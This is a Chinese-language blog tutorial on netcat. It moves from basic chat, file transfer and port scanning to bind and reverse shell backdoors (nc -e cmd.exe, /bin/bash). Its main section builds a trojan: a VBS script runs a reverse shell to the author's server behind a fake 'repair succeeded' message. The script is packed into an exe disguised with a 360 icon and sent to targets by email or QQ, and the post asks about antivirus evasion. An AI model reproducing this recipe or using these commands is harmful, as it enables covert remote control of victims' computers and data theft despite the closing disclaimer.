nc语法和nc木马远程控制主机
- nc语法和功能学习
- 基本使用
- netcat文件传输
- 信息探测
- 建立后门
- 命令参数
- 利用nc做小木马
- 1.原理
- 2.简单实现
- 3.攻击过程
- 总结
nc语法和功能学习
基本使用
-l 监听 -p 端口
例如:建立聊天通信功能
PC1:nc -l -p 4444 监听444端口 创建服务端
PC2:nc 172.16.20.2 4444 创建客户端
- -e prog 程序重定向,一旦连接,就执行 [危险!!]
实现客户端控制服务端cmd
netcat文件传输
使用场景
文件传输使用方法
实现客户端向服务端传输文件
- 创建服务端
-nc -l -p 4444 > outfile(文件名)
把监听4444端口的信息输出到outfile文件
- 创建客户端(连接服务端)
-nc 172.16.1.1 4444 <infile(文件路径)
把infile文件发送到对应ip的端口
实现服务端向客户端传输文件
- 创建服务端
-nc -l -p 4444 <infile
- 创建客户端(连接服务端)
-nc 172.16.1.1 4444 >outfile
注意:如果网络延迟大,客户端没有联机成功会造成假死,为避免这种情况,
-nc -w3 172.16.1.1 4444 设置限制时间3s
信息探测
- 使用场景
- 端口扫描方法
所有端口扫描:-nc -v -n -z -w1 172.16.1.1 1-65535
- Banner抓取方法
-nc -n -v -w1 172.16.1.1 1-1000
建立后门
- 使用场景
windows建立后门
监听型后门:
-nc -l -p 4444 -e cmd.exe 客户端控制服务端
连接型后门:
-nc 172.16.1.1 4444 -e cmd.exe 服务端控制客户端
linux建立后门
监听型后门:
-nc -l -p 4444 -e /bin/bash
连接型后门:
-nc 172.16.1.1 4444 -e /bin/bash
命令参数
利用nc做小木马
1.原理
都知道nc有很多功能,其中最好玩的就是建立后门和文件传输。但是主机都有防火墙,未知的端口不得访问,所以我们就要让目标访问自己来绕过其防火墙,也就是自己做监听,目标做连接并返回cmd或者bash。
坑1:自己主机防火墙要开启对应端口,可局域网也可公网,公网远程攻击要自己搭一个服务器
坑2:目标主机可能没有nc,所以要在同目录加上nc程序(很小很小,所以为瑞士军刀)
2.简单实现
我用的是某云服务器,开放某某端口,
- 制作vbs脚本
Set ws=CreateObject("Wscript.Shell")
ws.run "cmd /k cd ./bin&& .\nc.exe -t -d -e cmd.exe x.x.x.x 3333 ",vbhide
WScript.Echo("Program repair succeeded! ")
wscript.sleep 1500
主要功能cmd /k cd ./bin&& .\nc.exe -t -d -e cmd.exe x.x.x.x 3333
打开cmd并打开同目录下的bin文件夹,并且在此目录下执行\nc.exe -t -d -e cmd.exe x.x.x.x 3333 命令,就是连接x.x.x.x 3333 端口
剩下两行都是用来伪装的,其他手段自行实施
结果
- 加壳转exe,伪装
我用的是vbs to exe
可以上网搜.ico程序图标来伪装
结果图:
我伪装成了360
接下来就是好玩得了
把我文件通过邮件、qq等途径发送
3.攻击过程
- 连接
服务器安全组开启3333端口
服务器开始监听端口
目标点击后
服务端会看到已经拿到目标主机的cmd
- 文件传输
服务器ssh在复制会话(xshell),端口对应的也要多开一个,就叫服务器2
服务器2监听传输文件到outfile
服务器1也就是那开始拿到目标shell的
再回到服务器2就可以当前目录下有outfile文件,传输成功
总结
反正拿了shell,你想干嘛就干嘛,本过程只用了nc,也可以结合其他工具远程控制,自己想象,不过!!!重点来了,还有一个问题就是exe程序免杀!我还在学习,还请各路神仙指教。
以上只供学习思路参考,请勿非法利用,网络安全法在心中。
nc语法和nc木马远程控制主机相关推荐
- netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell
NC学习笔记 搭配这个视频链接使用更佳 https://space.bilibili.com/439906928/channel/seriesdetail?sid=231485 基础概念 nc是什么? ...
- R语言构建仿真数据库(sqlite)并使用dplyr语法和SQL语法查询数据库、将dplyr语法查询语句翻译为SQL查询语句
R语言构建仿真数据库(sqlite)并使用dplyr语法和SQL语法查询数据库.将dplyr语法查询语句翻译为SQL查询语句 目录
- html和css之间有什么区别,html语法和css语法之间有什么区别
区别:HTML由围绕内容的标签组成,例" 内容 ":而CSS由一条或多条声明和选择器组成,每条声明由一个属性和一个值组成,例"div{font-size:12px;}&q ...
- python xpath语法-XPath语法和lxml模块(数据提取)
XPath语法和lxml模块 XPath lxml库 1.什么是XPath? XPath (XML Path Language) 是一门在 XML 文档中查找信息的语言,可用来在 XML 文档中对元素 ...
- python xpath语法-Python爬虫之XPath语法和lxml库的用法
本来打算写的标题是XPath语法,但是想了一下Python中的解析库lxml,使用的是Xpath语法,同样也是效率比较高的解析方法,所以就写成了XPath语法和lxml库的用法 安装 为什么要用这个库 ...
- MongoDB的查询语法和SQL的SELECT语法做对比
2019独角兽企业重金招聘Python工程师标准>>> 对 数据库的查询是相当频繁的,而且很多特殊的需求我们都可以通过SQL查询语句构造出来.那么我们平时习惯的SELECT语法实现的 ...
- CSS语法和CSS优先级
语法 层叠样式表( Cascading Stylesheet ,简称CSS ), 其基本目标是让浏览器以指定的特性去绘制页面元素,比如颜色,定位,装饰.CSS的语法反映了这个目标,由下面两个部分构建: ...
- 一款基于Latex语法和MathJax渲染的零基础公式编辑器,数学公式插件
零基础即可编辑公式 支持自定义编辑器配置和风格 支持二次编辑公式 支持作为插件和富文本编辑器一起使用 介绍 基于Latex语法和MathJax渲染的公式编辑器插件,易用.可二次编辑.内容可视化. 标题 ...
- 在linux中,命令 nc -lk 和nc -lp 的区别是什么
java面试题网站:www.javaoffers.com 在linux中,命令 nc -lk 和nc -lp 的区别是什么 nc -l 开启 监听模式,用于指定nc将处于监听模式.通常 这样代表着 ...
- 如何用Jenkins通过SSH远程控制主机执行命令
背景 Jenkins服务器运行在一台主机上,但实际的运行环境在另一台主机上,Jenkins要做的事是远程控制主机何时运行脚本,以及将运行后的结果显示在Jenkins上. 什么是SSH ssh是一种网络 ...
最新文章
- 停电后程序员怎么写代码 | 每日趣闻
- 攻击 xxs_“吃鸡”又出现1招炸队友不受惩罚,xxs乐坏了,请别手误打载具
- Spring整合Redis做数据缓存(Windows环境)
- 嵌入式与单片机之间的关系是什么?
- TabHost两种实现方式
- [转载]struts+hibernate遇到的错误总结
- java并发编程-----深入剖析ThreadLocal
- 内存回收算法与 Hot Spot 算法实现细节
- mysql数控不小心被删_mysql 数据库信息不小心被删除了, 请问能恢复么
- ES6新特性_ES6对象添加Symbol类型属性---JavaScript_ECMAScript_ES6-ES11新特性工作笔记016
- 据说集齐这些特点的智能硬件百分百“作死”
- JDBC的那点事之DatabaseMetaData之获取数据库所有表
- 如何测网络稳定性_功率计如何测准极限低功率小信号
- 网络安全实验4 SQL注入攻击
- 算法导论答案 16.2-2 0-1背包问题的动态规划算法
- 高等数学(第七版)同济大学 总习题二 个人解答
- 嵌入式linux交叉开发环境,构建嵌入式Linux交叉开发环境
- GB/T19001—2008质量管理体系要求、标准、贯标(贯彻标准)
- html链接打开word文档,一招教你在Word文档中创建超链接打开其他文件
- Tangent Element调色台的设计和功能同等重要